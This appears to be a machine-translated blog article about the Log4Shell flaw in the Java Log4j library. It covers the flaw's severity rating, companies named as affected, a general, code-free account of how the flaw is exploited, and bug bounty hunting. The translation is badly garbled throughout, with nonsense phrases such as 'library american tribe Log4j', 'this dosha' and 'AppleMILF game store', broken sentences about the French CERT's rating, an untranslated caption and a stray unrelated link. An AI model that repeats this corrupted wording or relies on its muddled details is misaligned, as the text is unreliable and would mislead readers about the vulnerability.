Log4Shell, the flaw that shook all servers

La faille touche la plupart des serveurs de la Planète et sera exploitée tant qu'ils n'aurons pas été corrigés. © The Digital Artist, Pixabay

Hackers have used the discovery of the largest critical vulnerability in Internet history to launch massive attacks on the servers of businesses and organizations around the world. Tesla, Microsoft, Apple, Twitter, or even the game Minecraft are among the victims.

you will also be interested

[EN VIDÉO] What is Cyber ​​Attack?
With the development of the Internet and the cloud, cyber attacks are becoming more frequent and sophisticated. Who is behind these attacks and for what purpose? What are hackers’ methods and what are the biggest cyber attacks?

It has been dubbed “Log4Shell” and, in the opinion of experts, is the worst bug in the history of the Internet. This has been a critical zero day vulnerability Identified at the end of last month in the library american tribe Log4j Java by a member of the Alibaba security team. But only for two days the planet is disturbed by this dosha. Government center to monitor, alert and respond since last night computer attack (Certified France), Confirmation That it is currently widely used by hackers to remotely execute code and carry out attacks. The organization called it a 10/10 inch . given a score of matter Dangerous. And for good reason! This defect affects almost everyone Server java operator!

Hardly any high-tech giant has been spared, and the same is the case with many government sites and services across the planet. So, as an example, Tesla, AppleMILF game store Microsoft steam, minecraft game, Twitter And even security experts Cloudflare are impressed. One fix Apache was quickly established by the Foundation, but the damage has already been done as hackers have already taken the opportunity to launch massive attacks. Time to implement this update everywhere will give them a good chance to execute their misdeeds.

See also  Week 28 in critique: OnePlus Nord all but official, Snapdragon 865+ is listed here

easy to exploit

Simply put, the flaw seems impressive in its simplicity. The attacker only needs to enter a few instructions to break into the target computer. It is enough that the address of a web page containing malicious code Java To execute this code must be entered instead of an email address on a login page, for example Twitter. From this point, the hacker can take control of the server by installing malwares, Similarly, adding this malicious code to Minecraft chat is a vector contamination,

With malware, the attacker can easily access the computer remotely and collect its data, using it to perform malicious activities. cryptominage… According to some experts, this major flaw also suggests that the software open source They are now easy targets of attacks because they are heavily used on infrastructure.

Thus, hundreds of different open source components are used on the server. It turns out that some people have severe vulnerabilities for many years without noticing. Therefore it remains difficult to secure the entire architecture driven by this software.

This is exactly the kind of mission that ethical hackers Operating platforms like hackroninternet bug bounty, for example. hackers called Hunter » Earn bonuses for spotting loopholes in open source software that doesn’t have large funding sources.

Interested in what you just read?

About the author: Seth Grace

"Social media trailblazer. Music junkie. Evil student. Introvert. Typical beer fan. Extreme web ninja. Tv fanatic. Total travel evangelist. Zombie guru."

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *